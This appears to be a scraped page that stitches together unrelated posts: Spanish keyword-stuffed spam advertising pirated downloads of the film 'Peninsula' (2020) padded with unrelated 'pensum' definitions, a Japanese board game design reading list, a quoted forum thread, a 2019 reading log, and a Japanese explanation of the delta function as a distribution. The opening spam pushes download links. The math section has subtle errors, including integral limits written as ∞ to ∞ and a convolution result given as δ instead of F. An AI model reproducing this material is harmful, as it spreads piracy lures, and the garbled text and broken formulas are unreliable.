Fechas de estreno: 2020-07-15 Género: Action, Horror, Thriller Duración: 114 Minutes Company : Next Entertainment World, RedPeter Film Reparto: Kang Dong-won, Lee Jung-hyun, Lee Re, Kwon Hae-hyo, Kim Min-jae, Koo Kyo-hwan, Kim Do-yoon, Lee Ye-won, Kim Gyu-baek, Jang So-yeon
HD Descargar ►► haga clic aquí
REVISIÓN:
¿Qué es Pensum » Su Definición y Significado 2020 ~ El pensum es el plan de estudio de una carrera que da a conocer las materias o asignaturas que se estudiarán en cada período de la misma Éste está meticulosamente preparado por los docentes o profesionales del curso con la finalidad de que el estudiante perciba todos los conocimientos necesarios para iniciar su vida profesional una vez culminada su vida estudiantil
pénsum Definición Diccionario de la lengua española ~ Del lat pensum tarea obligación cf ingl pensum y fr pensum tarea escolar 1
pensun o pénsum Fundéu ~ Se trata de una forma de referirse al ‘plan de estudios’ En español debe tildarse pénsum y formar el plural como pensa caso excepcional recogido en la Gramática académica Con respecto al origen procede del latín pensum participio del verbo pendere Este verbo tiene numerosas acepciones y entre ellas está ‘examinar evaluar’
Pensum Definition of Pensum by MerriamWebster ~ History and Etymology for pensum New Latin from Latin duty charge something weighed out from neuter of pensus past participle of pendere to weigh estimate pay Learn More about pensum Dictionary Entries near pensum
Home Pontificia Universidad Javeriana ~ Perfil del egresado El profesional egresado de la carrera de Arquitectura de la Pontificia Universidad Javeriana está formado para liderar la transformación y organización del espacio físico adecuándolo a las necesidades humanas gerenciar los procesos a lo largo de su ejecución y brindar al país soluciones integrales acordes con sus características socioculturales y ambientales para
Pensum Escuela Dominical Nacional Ipuc escueladominicals ~ Pensum Escuela Dominical Nacional Ipuc Aviso legal Política de privacidad Política de cookies Mapa del sitio Inicia sesión Salir Editar Jimdo Esta página web ha sido creada con Jimdo ¡Regístrate ahora gratis en om
Pensum Universidad Autónoma de Santo Domingo ~ Ofertas Academicas Detalles Categoría Información General La Universidad Autónoma de Santo Domingo es una institución que une a profesoresas estudiantes y trabajadores administrativos de apoyo a la labor académica con el propósito de dar cumplimiento a la misión universitaria orientada hacia la búsqueda de la verdad la proyección del porvenir de la sociedad dominicana y el
Pensum Universidad Autónoma de Santo Domingo ~ Pensum Ingeniería Lacteoalimentaria Sobre la Carrera Pensum Tecnología en procesos lácteos alimentarios Pensum Sobre la Carrera Docentes Personal Administrativo Horarios y Contactos Centro de Adiestramiento Lechero CAL Veterinaria Sobre la Escuela Carreras Lic en Medicina Veterinaria Sobre la Carrera Pensum
Programas académicos – ITM ~ Campus Robledo Calle 73 No 76A 354 Vía al Volador Tel 574 440 51 00 Fax 574 440 51 02 Campus Fraternidad Calle 54A No 30 01 Barrio Boston
Universidad Dominicana OM ~ Tels 809 5337733 809 5332648 Fax 809 5350048 Email email protected Universidad Dominicana OM Ave Independencia 200 Rep Dom Ir a Contacto
Streaming en línea Peninsula (2020) búsqueda relacionada
Peninsula 2020 Pelicula Completa Online, Descargar Peninsula 2020 Pelicula Completa Torrent, Ver HD Peninsula 2020, Descargar Peninsula Pelicula Completa en Espanol Latino, Peninsula Pelicula Completa en Linea Subtitulado, Peninsula Pelicula Completa Espanol, Watch Peninsula (2020) Online Free, Download Peninsula (2020) Soundtrack, Watch Peninsula (2020) Online Dailymotion, Download Peninsula (2020) Subtitle, Watch Peninsula (2020) Online Best Quality, Watch Peninsula (2020) Free Good Quality,Ver~ Peninsula 【2020】 Pelicula Online HD En Español,Ver~ Peninsula - 2020 En Español Latino HD 1080p},Ver~ Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,Cuevana~HD Peninsula Pelicula Completa Latino ☆HD☆2020,Cuevana~HD Peninsula Pelicula Completa en Español Latino 2020,Cuevana~HD Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,Cuevana~HD Peninsula 2020 Pelicula Completa latino HD 1080p,Cuevana~HD Peninsula 【2020】 Pelicula Online HD En Español,Cuevana~HD Peninsula - 2020 En Español Latino HD 1080p},Cuevana~HD Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,Descargar Peninsula Pelicula Completa Latino ☆HD☆2020,Descargar Peninsula Pelicula Completa en Español Latino 2020,Descargar Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,Descargar Peninsula 2020 Pelicula Completa latino HD 1080p,Descargar Peninsula 【2020】 Pelicula Online HD En Español,Descargar Peninsula - 2020 En Español Latino HD 1080p},Descargar Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,Ver (online) Peninsula Pelicula Completa Latino ☆HD☆2020,Ver (online) Peninsula Pelicula Completa en Español Latino 2020,Ver (online) Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,Ver (online) Peninsula 2020 Pelicula Completa latino HD 1080p,Ver (online) Peninsula 【2020】 Pelicula Online HD En Español,Ver (online) Peninsula - 2020 En Español Latino HD 1080p},Ver (online) Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,Mega~HD Peninsula Pelicula Completa Latino ☆HD☆2020,Mega~HD Peninsula Pelicula Completa en Español Latino 2020,Mega~HD Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,Mega~HD Peninsula 2020 Pelicula Completa latino HD 1080p,Mega~HD Peninsula 【2020】 Pelicula Online HD En Español,Mega~HD Peninsula - 2020 En Español Latino HD 1080p},Mega~HD Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,MegaTorrent Peninsula Pelicula Completa Latino ☆HD☆2020,MegaTorrent Peninsula Pelicula Completa en Español Latino 2020,MegaTorrent Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,MegaTorrent Peninsula 2020 Pelicula Completa latino HD 1080p,MegaTorrent Peninsula 【2020】 Pelicula Online HD En Español,MegaTorrent Peninsula - 2020 En Español Latino HD 1080p},MegaTorrent Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,uTorrent Peninsula Pelicula Completa Latino ☆HD☆2020,uTorrent Peninsula Pelicula Completa en Español Latino 2020,uTorrent Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,uTorrent Peninsula 2020 Pelicula Completa latino HD 1080p,uTorrent Peninsula 【2020】 Pelicula Online HD En Español,uTorrent Peninsula - 2020 En Español Latino HD 1080p},uTorrent Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,[ VER]] Peninsula Pelicula Completa Latino ☆HD☆2020,[ VER]] Peninsula Pelicula Completa en Español Latino 2020,[ VER]] Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,[ VER]] Peninsula 2020 Pelicula Completa latino HD 1080p,[ VER]] Peninsula 【2020】 Pelicula Online HD En Español,[ VER]] Peninsula - 2020 En Español Latino HD 1080p},[ VER]] Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,PelisPLUS~ Peninsula Pelicula Completa Latino ☆HD☆2020,PelisPLUS~ Peninsula Pelicula Completa en Español Latino 2020,PelisPLUS~ Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,PelisPLUS~ Peninsula 2020 Pelicula Completa latino HD 1080p,PelisPLUS~ Peninsula 【2020】 Pelicula Online HD En Español,PelisPLUS~ Peninsula - 2020 En Español Latino HD 1080p},PelisPLUS~ Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado,Mirapelis~ Peninsula Pelicula Completa Latino ☆HD☆2020,Mirapelis~ Peninsula Pelicula Completa en Español Latino 2020,Mirapelis~ Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆,Mirapelis~ Peninsula 2020 Pelicula Completa latino HD 1080p,Mirapelis~ Peninsula 【2020】 Pelicula Online HD En Español,Mirapelis~ Peninsula - 2020 En Español Latino HD 1080p},Mirapelis~ Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado, Peninsula Pelicula Completa Latino ☆HD☆2020, Peninsula Pelicula Completa en Español Latino 2020, Peninsula [2020]Pelicula Completa Latino Mega ☆HD☆, Peninsula 2020 Pelicula Completa latino HD 1080p, Peninsula 【2020】 Pelicula Online HD En Español, Peninsula - 2020 En Español Latino HD 1080p}, Peninsula 2020 Pelicula Online HD En Español Latino MEGA HD 1080p Subtitulado, Watch Peninsula (2020) Online Free Yesmovies, Watch Peninsula (2020) Reddit 123movies, Watch Peninsula (2020) Blu Ray Online Free, Download Peninsula (2020) Leaked Full Movie, Download Peninsula (2020) English Version, Watch Peninsula (2020) Good Quality, Watch Peninsula (2020) Download Free, Watch Peninsula (2020)
0 notes
Text
ボードゲームデザイナーのための読書案内
ボードゲームをデザインする技術を磨くための一番の方法は、ボードゲームをデザインすることです。実践こそが最短の近道だからです。
しかしその一方で、先人たちが実践を繰り返すことによって得てきた知見を、読書によって借り受けることもできます。自分の手足で山を登る以外に力をつける方法はありませんが、巨人の肩に乗ることで見える景色はあり、自分の行くべき場所を知ることができるかもしれません。
ここでは、ボードゲームのデザインを志す方に向けて、役に立つであろう書籍を紹介します。特に薦めたいものには【オススメ(^_^)/】と記載しています。
実践的なゲームデザイン全般の本
中ヒットに導くゲームデザイン【オススメ(^_^)/】
中ヒットに導くゲームデザイン
Tracy Fullerton
ボーンデジタル
Amazonで詳細を見る
『世界の七不思議』や『花火』のデザイナーとして有名なアントワーヌ・ボウザが来日したとき、小さな講演の中である書籍を推薦しました。それがこの本です。
この本は三部構成で、第一部では、ゲームの構造を「フォーマル要素」「ドラマチック要素」「システム力学」という3つに分解することでゲームデザインの基礎を分析します。第二部では、コンセプトの立案からプロトタイプの作成、テストプレイの実施など、ゲームデザインの過程を解説します。そして第三部では、実際のゲーム産業での働き方について説明しています。
実践的であり、ボードゲームを範疇に含めており、かつ日本語で読めるという条件をすべて満たすものの中では、この本が最も優れているのではないかと思います。要所で簡潔な演習問題を設けるなど、教科書的な構成になっており、学習用に読むのに向いています。
また、アラン・ムーンやリチャード・ガーフィールドなど、多数のゲームデザイナーのコラムやインタビューが随所に挿入されているのも特徴です。
問題点として、日本語訳の質が非常に低いということが挙げられます。英語を読める場合は、原書を読むのが望ましいと思います。
原書はこちらです。
Game Design Workshop: A Playcentric Approach to Creating Innovative Games, Third Edition
Tracy Fullerton
A K Peters/CRC Press
Amazonで詳細を見る
Game Design Workshop の和訳がどのくらいひどいのかと言うとこのくらいひどい。 pic.twitter.com/fGMR03zJUT
— カレー / I was game (@dbs_curry) May 15, 2017
The Art of Game Design: A Book of Lenses 【オススメ(^_^)/】
The Art of Game Design: A Book of Lenses, Second Edition
Jesse Schell
A K Peters/CRC Press
Amazonで詳細を見る
実践的なゲームデザインの本として定評があり、多くのゲームデザイナーに推薦されています。
この本は、ゲームデザインを行ううえでの様々な「レンズ」(視点)を提供するものです。内容は非常に多岐にわたり、メカニクス、バランス、パズル、インターフェイス、ストーリー、キャラクター、コミュニティ、��レイテストなど様々なものを取り扱っており、包括的なものになっています。
全章を通して、以下の例のような「レンズ」が計100個挙げられています。
レンズ #32:意味のある選択のレンズ
意味のある選択を行うとき、われわれは重要なことをしているという感覚を得ることができる。このレンズを使うために、これらの問いを自分に投げかけてみよう。
自分はプレイヤーにどんな選択をさせようとしているのだろう?
それらの選択には意味があるだろうか? だとしたらどのように?
自分はプレイヤーに正しい数の選択肢を与えているだろうか? もっと増やせば、プレイヤーに自身が強力だと感じさせることができるだろうか? もっと減らせば、ゲームをより明快にすることができるだろうか?
自分のゲームに支配的な戦略は存在するだろうか?
日本語版は出版されていないものの、上の『中ヒットに導くゲームデザイン』と並んで、実践的なゲームデザインの本の中では最良のもののひとつだと思います。
「レベルアップ」のゲームデザイン
「レベルアップ」のゲームデザイン ―実戦で使えるゲーム作りのテクニック
Scott Rogers
オライリージャパン
Amazonで詳細を見る
ビデオゲームデザインの本ではありますが、イラストがふんだんに使用され、文体も軽妙であり非常に読みやすい本です。
内容も包括的でおもしろいです。ボードゲームデザインに直接的に活用できるものではありませんが、ビデオゲームに関する話でも参考になると考える場合にはおすすめです。
キャラクター、コントロール、カメラという「3つのC」から始まって、レベルデザインやメカニズム設計の要点などをまとめてくれています。基本的な内容ではありますが、ゲームデザインドキュメントの書き方なども丁寧に解説されており、実践を意識されています。
「おもしろい」のゲームデザイン
「おもしろい」のゲームデザイン ―楽しいゲームを作る理論
Raph Koster
オライリージャパン
Amazonで詳細を見る
ゲームとは何なのか、人間にとっておもしろいとはどういうことなのか、ということを語った本です。
各ページに巨大なイラストが配されており、論理的というよりはエッセイ的な内容です。
この本も翻訳に難があります。
「ヒットする」のゲームデザイン
「ヒットする」のゲームデザイン ―ユーザーモデルによるマーケット主導型デザイン
Chris Bateman, Richard Boon
オライリージャパン
Amazonで詳細を見る
プレイヤーをいくつかの類型に分け、そのそれぞれのモデルに訴求するためにはどのようなゲームデザインを行えばいいかということを述べた本です。
ゲームデザインの本ではありますが、いくぶんマーケティング寄りです。
ゲームメカニクス
ゲームメカニクス おもしろくするためのゲームデザイン (Professional Game Developerシリーズ)
アーネスト・アダムス, ヨリス・ドーマンズ
SBクリエイティブ
Amazonで詳細を見る
マキネーション��いうフレームワークを用いて、ビデオゲームの構造をモデル化してデザインしようというコンセプトの本です。
複雑な要素が組み合わさって成り立っているビデオゲームから構造(例えば経済構造など)を抜き出して分析するので、ボードゲームのデザインの考え方にも通じる部分があると思います。
実践的なボードゲームデザインの本
Kobold Guide to Board Game Design 【オススメ(^_^)/】
Kobold Guide to Board Game Design
Mike Selinker, David Howell, Jeff Tidball, Richard Levy, Matt Forbeck
Lightning Source Inc
Amazonで詳細を見る
ボードゲームのデザインに主眼を置いた本は多くはありませんが、その中では本書が最もおすすめできます。
「コンセプティング」「デザイン」「デベロップメント」「プレゼンテーション」という4つの章に分かれており、それぞれのトピックについてジェームズ・アーネストやリチャード・ガーフィールドやスティーブ・ジャクソンといった著名なゲームデザイナーが記事を書いています。
複数のゲームデザイナーが参加しているため、独自の観点で書かれた記事が多く、おもしろいものになっています。しかしその分、全体の構成は体系だっておらず、ゲームデザインを学ぶための本というよりはゲームデザインに関するエッセイ集といった趣になっています。
The Game Inventor's Guidebook
The Game Inventor's Guidebook: How to Invent and Sell Board Games, Card Games, Role-Playing Games, & Everything in Between!
Brian Tinsman
Morgan James Publishing
Amazonで詳細を見る
『マジック:ザ・ギャザリング』のデザイナーの一人として知られるブライアン・ティンスマンの本です。
アメリカのゲーム産業についてや、いかに自分のゲームを出版までこぎつかせるかについて書かれています。ゲームデザインというよりは、産業全体のガイドブックという趣です。
Paid to Play
Paid to Play: The Business of Game Design
Keith A. Meyers
iUniverse
Amazonで詳細を見る
アメリカのゲームデザイナーであるキース・マイヤースの本です。
ゲームの着想を得るところから出版社との契約までについて書かれています。100ページ弱の薄い本です。
Tabletop Game Design for Video Game Designers
Tabletop Game Design for Video Game Designers
Ethan Ham
Focal Press
Amazonで詳細を見る
ビデオゲームのデザイナーにボードゲームのデザインを学ばせるというコンセプトの本です。
教科書的な構造で、多数の例とともに、ボードゲームに特徴的なメカニズムなどが挙げられています。
観念的なゲームデザインの本
ルールズ・オブ・プレイ【オススメ(^_^)/】
ルールズ・オブ・プレイ(上) ゲームデザインの基礎
ケイティ・サレン, エリック・ジマーマン
ソフトバンククリエイティブ
Amazonで詳細を見る
ルールズ・オブ・プレイ(下) ゲームデザインの基礎
ケイティ・サレン, Katie Salen, エリック・ジマーマン, Eric Zimmerman
SBクリエイティブ
Amazonで詳細を見る
ゲームデザインを研究した本の中では最も著名なものではないかと思います。ただし、ゲームデザインのしかたを教える本ではなく、ゲームやプレイとはいったい何なのかということを考える本なので、このを本を読んでゲームデザインを始め���うと思って読むと面食らうかもしれません。
「意味ある遊び」や「魔法円」など、ゲームデザインにおいて重要なコンセプトの多くを学べるため、この一冊を読んでおくとその後も役立つと思います。
ハーフリアル
ハーフリアル ―虚実のあいだのビデオゲーム
イェスパー・ユール
ニューゲームズオーダー
Amazonで詳細を見る
ゲームとは何か等について論じるイェスパー・ユールの本です。
あくまで研究書なので、ゲームデザインに直接結びつくというわけではありませんが、考えるうえでは役に立つ部分があると思います。
しかめっ面にさせるゲームは成功する
しかめっ面にさせるゲームは成功する 悔しさをモチベーションに変えるゲームデザイン
イェスパー・ユール
ボーンデジタル
Amazonで詳細を見る
同じくイェスパー・ユールの本です。
ゲームにおいて「プレイヤーの失敗」が持つ意味とは何なのか、ということを論じています。
Eurogames
Eurogames: The Design, Culture and Play of Modern European Board Games
Stewart Woods
McFarland
Amazonで詳細を見る
ユーロゲームがどのように成立してきたかという歴史と、ユーロゲームに見られる特徴的な要素などについて述べた本です。
これも直接的にゲームデザインに結びつくわけではありませんが、ボードゲームに焦点を当てた数少ない研究であり、ユーロゲームとはいったい何なのかということを考えるうえでは非常に良い本だと思います。
Characteristics of Games
Characteristics of Games (MIT Press)
George Skaff Elias, Richard Garfield, K. Robert Gutschera
The MIT Press
Amazonで詳細を見る
ゲームを多数の要素に分解して定義しながら論じていく本です。
挙げられる要素は、例えば、「マルチプレイヤー要素」として「脱落」「相互作用」「政治性」「キングメイキング」「チームワーク」など、「不確定要素」として「ランダム性」「運と技術」「非公開情報」など、他にも様々です。ゲームに関する概念を整理するうえで良い本だと思います。
ホモ・ルーデンス
ホモ・ルーデンス (中公文庫)
ホイジンガ
中央公論新社
Amazonで詳細を見る
古典です。
遊びと人間
遊びと人間 (講談社学術文庫)
ロジェ カイヨワ
講談社
Amazonで詳細を見る
古典です。
ゲーム以外のデザインの本
ノンデザイナーズ・デザインブック
ノンデザイナーズ・デザインブック [第4版]
Robin Williams
マイナビ出版
Amazonで詳細を見る
非デザイナーに向けたグラフィックデザインの本です。デザインの基本を「近接」「整列」「コントラスト」「反復」の4原則によって説明してくれます。
基本的にはグラフィックデザインの本ですが、ボードゲームのデザインにも応用できる部分はあると思います。もちろん、カードやコマなどのインターフェイス部分を考える際には直接的に役に立ちます。
誰のためのデザイン?
誰のためのデザイン? 増補・改訂版 ―認知科学者のデザイン原論
D. A. ノーマン
新曜社
Amazonで詳細を見る
インターフェイスデザインについての名著です。
ボードゲームのインターフェイスをデザインするうえでも役に立つと思います。
頭にガツンと一撃
頭にガツンと一撃
ロジャー・フォン・イーク
新潮社
Amazonで詳細を見る
『マジック:ザ・ギャザリング』のヘッドデザイナーであるマーク・ローズウォーターがことあるごとに薦めている本です。
デザインの本ですらなくアイデアの発想法の本ですが、様々な見方を提供してくれ、おもしろいです。
10 notes
·
View notes
Quote
89: 風吹けば名無し 2017/11/04(土) 16:13:24.79 ID:+2deJuE30.net こんなのに引っかかるやつ未だにいるんか? もう10年以上使われてるやろ 101: 風吹けば名無し 2017/11/04(土) 16:14:35.88 ID:lOSPcz4w0.net >>89 ガキンチョのころ初めて出くわして、泣いて親に怒られたのいい思い出や 114: 風吹けば名無し 2017/11/04(土) 16:16:06.86 ID:JMin6LIk0.net >>89 厨房よりネットにあんまり触れてない家庭持ちの中年を狙ってるらしいで 妻子に見られたくないし泣きつく相手もいないし金も2無くはないから払っちゃうとか 120: 風吹けば名無し 2017/11/04(土) 16:16:57.67 ID:S8TUmcxcd.net >>114 なんJに頼ればええのに
暇人/(^o^)\速報: 【悲報】ワイ、エッチな封筒が送り付けられる模様
5 notes
·
View notes
Text
2019 年に読んだ本

昨年読んだ本の中で、印象に残っているものをピックアップした。
(Amazon へのリンクにはアフィリエイトの ID が埋まっているので、気になる方はご注意を)
開発系
初めて Scrum 開発に参加することになったので、アジャイル開発系の書籍をいくつか読んだ。

リーン開発の現場 カンバンによる大規模プロジェクトの運営
posted with amazlet at 20.01.02
Henrik Kniberg オーム社 売り上げランキング: 192,678
Amazon.co.jpで詳細を見る
Scrum で数 Sprint 経験し、冬休み明けに複数のチームに分ける見込みがあったので、大きめのプロジェクトのアジャイル開発のプロセスやセレモニーについて説明しているものを探し、この書籍を購入した。
一年経った今見返しても、カンバンを拡張して Sprint の外の状態を管理していたり、複数のチームからなる開発プロジェクトの進め方や、プロセスメトリクス、バグや WIP の管理の仕方等、実践的な手法が紹介されており、参考になることが多い。

カイゼン・ジャーニー たった1人からはじめて、「越境」するチームをつくるまで
posted with amazlet at 20.01.02
市谷 聡啓 新井 剛 翔泳社 売り上げランキング: 19,463
Amazon.co.jpで詳細を見る
社内の開発者が薦めてくれたので読んでみた。
特にテーマ設定無しで読み始めたのだが、アジャイル開発プロセスの進め方、計画の仕方、開発中に発生した問題に対する取り組み方、チームビルディングの仕方等がストーリー仕立てで一つ一つ丁寧に説明されていて面白かった。特にチームビルディングのところは参考になることが多かった。

リーン・スタートアップ
posted with amazlet at 20.01.02
エリック・リース 日経BP 売り上げランキング: 7,260
Amazon.co.jpで詳細を見る
開発を行っていく中で、ビジネスと開発のサイクルのギャップを感じるようになってきた。よくある話だと思うが、開発はイテレーティブだけれども、ビジネスとしては期間と予算があり、どこにポイントを置いてそれらを合わせていくか。そこから、ビジネスプロセスをリーン側に寄せることはできないか、というあたりに興味を持ち、本書を読んでみた。
本書は、「まずやってみよう」ではなく、アントレプレナーには起業に伴うチャンスを現実のものとするマネジメント原則が必要である、という立ち位置で始まっている。そして、製品を作り上げることではなく、構築─計測─学習というフィードバックループを通じて、持続可能な事業の構築方法を学ぶことがスタートアップにおける価値である、と説く。故に「素晴らしい製品の作り方」のような話は無く、いかに作らずに早く最小限の製品(Minimum Viable Product - MVP)を提供してフィードバックを得るか、というポイントを中心に話が進む。
結果として、この本の中ではビジネスと開発のサイクルのギャップにどう折り合いを付けているか、という話は無かった。そもそもビジネスと開発を別々のものとして捉えていない。ビジネスアクティビティの中の一つとしての開発。構築─計測─学習のサイクルを早く回す為に何を作るべきか。どのようにフィードバックを受ける仕組みを作るか。そいういうことを考えるようになった。

THE TEAM 5つの法則 (NewsPicks Book)
posted with amazlet at 20.01.02
麻野 耕司 幻冬舎 (2019-04-03) 売り上げランキング: 3,614
Amazon.co.jpで詳細を見る
チーム開発を行っていくにあたり、チームビルディングの方法を学ぶ為に読んだ。
チームを作っていく為に必要な 5 つの法則、Aim(目標設定)・Boarding(人員選定)・Communinacation(意思疎通)・Decision(意思決定)・Engagement(共感創造) それぞれについて説明されている。これまでイチらかチームを作る、ということにそれほど向き合ってこなかったので、何にポイントを置いて考えるべきなのか、という点で参考になった。
技術系

Kubernetes完全ガイド impress top gearシリーズ
posted with amazlet at 20.01.02
インプレス (2018-09-21) 売り上げランキング: 544
Amazon.co.jpで詳細を見る
扱うコンテナの種類が多く、Kubernetes に乗り換えた方が良いのでは、と思い始めたので、Kubernetes の機能を最も網羅してそうな本書を手に取った。実際に読んで見ると、Kubernetes が持つ機能が丁寧に説明されており、Kubernetes に触れたことが無い自分でも読みやすかった。今年買った唯一の技術書だったが、買って良かった。
一通り読み終えた後、Kubernetes を自前で運用することは、小さなクラウドを自前で運用するのと似ていると感じた。故に、パッと飛びつくのは止めておいた方が良さそうという結論に至った。次はチャレンジしてみたい。できればマネージドサービスで素振りしてからにしたい。
その他

エッセンシャル思考 最少の時間で成果を最大にする
posted with amazlet at 20.01.02
かんき出版 (2014-12-12) 売り上げランキング: 1,258
Amazon.co.jpで詳細を見る
昔から評判が良い本なので読んでみた。
この手の本はいくつか読んでいるが、これ一冊読めば良いな、と。そして難しいのは、大事な一つを選ぶこと。不要なものを削ぎ落とす労力を惜しまないことだな、と。

SOFT SKILLS ソフトウェア開発者の人生マニュアル
posted with amazlet at 20.01.02
日経BP (2016-06-02) 売り上げランキング: 28,547
Amazon.co.jpで詳細を見る
これも最近の本では無いが、時間があったので読んでみた。
もうちょっとプレゼンスとか副業の話が中心なのかと思っていたが、読んでみるとソフトウェア開発や仕事の仕方についてシッカリ書かれていて面白かった。ただ、そんなに目新しいことが書かれているカンジでも無い。

すべての知識を「20字」でまとめる 紙1枚!独学法
posted with amazlet at 20.01.02
SBクリエイティブ (2018-11-21) 売り上げランキング: 327
Amazon.co.jpで詳細を見る
短く説明したい、要約したい、と思うことが多くなったので、読んでみた。
「キーワードを抜き出して整理し、短い言葉でまとめる」「2W1H, さらに各項目を 3 点までにまとめる」というあたりは参考になった。本や長めの Web 記事を読んだ時に実践するようにしている(ちょっと面倒だと感じるものの)。
0 notes
Text
デルタ関数とは、超関数とは
デルタ関数って結局何なの?
工学の至る所で現れるデルタ関数。これはよく $$ \delta(t):= \begin{cases} \infty, & t=0\\newline 0, & t\ne 0 \end{cases}, $$ $$ \int_\infty^\infty \delta(x-y)f(y)dy = f(x), $$ $$ \int_\infty^\infty \delta(t)dt = 1 $$ を満たす関数 $\delta$ という風に定義されていますが、「 $t=0$ は測度0なので、その積分は0になるのでは」と考えたことがある人は多いのではないでしょうか。 実はこの定義は不正確なものであり、「超関数」という概念によって、正確に定義することができます。
超関数の定義
ある数値を入力するとある数値を出力する装置のことを、関数といいます。 これに対して、ある関数を入力するとある複素数を出力するような装置のことを、汎関数といいます。 汎関数 $F$ に関数 $\phi$ を入力した時の出力値を $F[\phi]$ 、または $\langle F, \phi \rangle$ と書きます。以下では後者の書き方を用います。
全区間で無限回微分可能で、関数値が0でないところが有界区間に限られるような関数の全体からなる集合を $\mathcal D$ とします。 $\mathcal D$ 上に属する関数 $\phi$ をテスト関数と呼びます。 また、 $\mathcal D$ を定義域とする汎関数を $\mathcal D$ 上の汎関数と呼びます。
ここで、シュワルツの超関数は、つぎのように定義されます。
汎関数 $F$ が、
$\langle F, \phi_1 + \phi_2\rangle = \langle F, \phi_1\rangle + \langle F, \phi_2\rangle,$
$\langle F, c\phi\rangle = c\langle F, \phi\rangle\ (c\in\mathbb K),$
テスト関数の列 ${\phi_n}$ が $n\to\infty$ で $\phi$ に収束する時、 $\langle F, \phi_n\rangle$ もまた $\langle F, \phi\rangle$ に収束する
を満たすとき、 $F$を超関数という。
$F$ が超関数であるためには、 $\mathcal D$ に属する全てのテスト関数が、上の性質を満たさなければなりません。したがって、 $\mathcal D$ の範囲を狭くとれば、 $F$ は超関数として成り立ちやすくなり、逆もまた然りということが成り立ちます。 今回 $\mathcal D$は 上のように定義しましたが、超関数のフーリエ変換を考える上では、上の定義では広すぎることが知られています。
超関数の演算の定義
超関数の演算についていくつか定義します。
任意のテスト関数 $\phi$ について $$ \langle F, \phi\rangle = \langle G, \phi\rangle $$ が成り立つとき、「超関数 $F$ と $G$ が等しい」と言います。
超関数 $F$ を $a$ だけ平行移動した超関数 $F_{x-a}$ を $$ \langle F_{x-a}, \phi\rangle := \langle F, \phi(x+a)\rangle $$ と定義します。
超関数 $F$ の導超関数 $dF/dx$ を $$ \langle \frac{dF}{dx}, \phi\rangle := -\langle F, \frac{d\phi}{dx}\rangle $$ で定義します。右辺で符号が反転する理由については後述します。
$g(x)$ を無限回微分可能な関数とすると、 $F$ との積について $$ \langle g(x)F, \phi(x)\rangle := \langle F, g(x)\phi(x)\rangle $$ と定義します。
超関数 $F$ と関数 $g(x)\in\mathcal D$ の合成積として $$ F*g(x):= \langle F_y, g(x-y)\rangle $$ を定義します。ここで右辺は、 $g(x-y)$ を $y$ のみの関数と見て超関数 $F$ に代入したものです。
超関数 $F$ と $G$ の合成積として $$ \langle F*G, \phi(x)\rangle := \langle F_x, \langle G_y, \phi(x+y)\rangle\rangle $$ を定義します。
デルタ関数の定義
以上を踏まえた上で、 デルタ関数は $$ \langle \delta, \phi\rangle = \phi(0) $$ を満たす超関数として定義されます。
このように定義されたデルタ関数について成り立ついくつかの性質を導きましょう。
平行移動について $$ \langle \delta_{x-a}, \phi\rangle = \langle \delta, \phi(x+a)\rangle = \phi(a). $$
微分について $$ \langle \frac{d\delta}{dx}, \phi\rangle := -\langle \delta, \frac{d\phi}{dx}\rangle = -\phi'(0). $$
積について $$ \langle g(x)\delta, \phi(x)\rangle := \langle \delta, g(x)\phi(x)\rangle = g(0)\phi(0) \ = g(0)\langle \delta, \phi\rangle = \langle g(0)\delta, \phi\rangle. $$ より、 超関数の意味で$g(x)\delta=g(0)\delta$。 ここで、 $g(x)=x$とすれば、 $x\delta=0$ なので、形式的にはじめの「 $x\ne0$ の時 $\delta=0$ 」が確かめられます。
関数 $g(x)\in\mathcal D$ との合成積について $$ \delta*g(x):= \langle \delta_y, g(x-y)\rangle = g(x). $$
超関数 $F$ との合成積について
$$ \langle F*\delta, \phi(x)\rangle := \langle F_y, \langle \delta_x, \phi(x+y)\rangle\rangle = \\ \langle F_y, \phi(y)\rangle = \langle F_x, \phi(x)\rangle $$
により、超関数の意味で $F*\delta = \delta$ が成り立ちます。つまり、デルタ関数が合成積の単位元を与えることがわかります。
超関数の演算は積分を一般化したもの
超関数 $F$ について、形式的に $$ \langle F, \phi(x)\rangle = \int_\infty^\infty F(x)\phi(x)dx $$ と書いてみましょう。右辺は具体的な意味を持ちませんが、このように書くと、先に挙げた演算が整合性を持つことがわかります。
まず、定義の線型性については、積分の線型性に相当します。
次に、平行移動について、 $F_{x-a}$ を $F(x-a)$ と書くことにすると、 $$ \int_\infty^\infty F(x-a)\phi(x)dx = \int_\infty^\infty F(x)\phi(x+a)dx $$ として変数変換���たことに相当します。
微分については $$ \int_\infty^\infty \frac{dF}{dx}\phi(x)dx = [F(x)\phi(x)]^\infty_\infty - \int_\infty^\infty F(x)\phi'(x)dx $$ となり、右辺の第一項は $\phi\in\mathcal D$ なので $\lim_{x\to\pm\infty}\phi(x) = 0$により0となります。 先の定義で右辺で符号が反転する理由はこれです。
残りの演算も同様にして対応を確かめることができます。
以上により、超関数の演算は積分の性質を一般化していることがわかります。 このことが、はじめに触れたデルタ関数の「それらしい定義」を成り立たせている根拠になっています。
